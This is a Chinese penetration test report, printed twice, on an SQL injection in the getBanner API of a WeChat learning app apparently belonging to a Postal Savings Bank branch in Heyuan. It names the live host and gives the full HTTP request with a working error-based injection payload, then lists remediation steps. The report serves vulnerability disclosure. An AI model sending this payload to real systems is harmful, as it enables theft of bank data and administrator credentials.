渗透测试报告
漏洞名称:188储银行河源市分行-保密学习-存在SQL注入漏洞(第二处getBanner接口)
漏洞等级:高危
所在位置:https://study.mzzfwl.com/api/Index/getBanner
漏洞描述:邮储银行河源市分行-保密学习-存在SQL注入漏洞(第二处getBanner接口)
漏洞详情:
访问邮储银行河源市分行微信公众号-保密学习
首页存在接口获取Banner
存在SQL注入漏洞
POST /api/Index/getBanner HTTP/2
Host: study.mzzfwl.com
Content-Length: 113
Xweb_xhr: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x6309080f)XWEB/8501
Content-Type: application/json
Accept: */*
Accept-Language: *
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://servicewechat.com/wxc8321ccadec18dbf/8/page-frame.html
Accept-Encoding: gzip, deflate
{"page":1,"pagesize":5,"platform":"wx-hyxx'or(1)=cast(version() as numeric)and''='","token":0,"_device":"wechat"}
通过报错注入可获取到数据库版本
也可以获取数据库里的数据,比如管理员账号、密码
造成影响:
攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
修复建议:
1、对参数进行严格过滤;2、对进入数据库的特殊字符('"\<>&*;等)进行转义处理,或编码转换;3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型;4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行;5、严格限制网站所用数据库账号的权限,给此用户仅提供能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
渗透测试报告
漏洞名称:188储银行河源市分行-保密学习-存在SQL注入漏洞(第二处getBanner接口)
漏洞等级:高危
所在位置:https://study.mzzfwl.com/api/Index/getBanner
漏洞描述:邮储银行河源市分行-保密学习-存在SQL注入漏洞(第二处getBanner接口)
漏洞详情:
访问邮储银行河源市分行微信公众号-保密学习
首页存在接口获取Banner
存在SQL注入漏洞
POST /api/Index/getBanner HTTP/2
Host: study.mzzfwl.com
Content-Length: 113
Xweb_xhr: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x6309080f)XWEB/8501
Content-Type: application/json
Accept: */*
Accept-Language: *
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://servicewechat.com/wxc8321ccadec18dbf/8/page-frame.html
Accept-Encoding: gzip, deflate
{"page":1,"pagesize":5,"platform":"wx-hyxx'or(1)=cast(version() as numeric)and''='","token":0,"_device":"wechat"}
通过报错注入可获取到数据库版本
也可以获取数据库里的数据,比如管理员账号、密码
造成影响:
攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
修复建议:
1、对参数进行严格过滤;2、对进入数据库的特殊字符('"\<>&*;等)进行转义处理,或编码转换;3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型;4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行;5、严格限制网站所用数据库账号的权限,给此用户仅提供能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。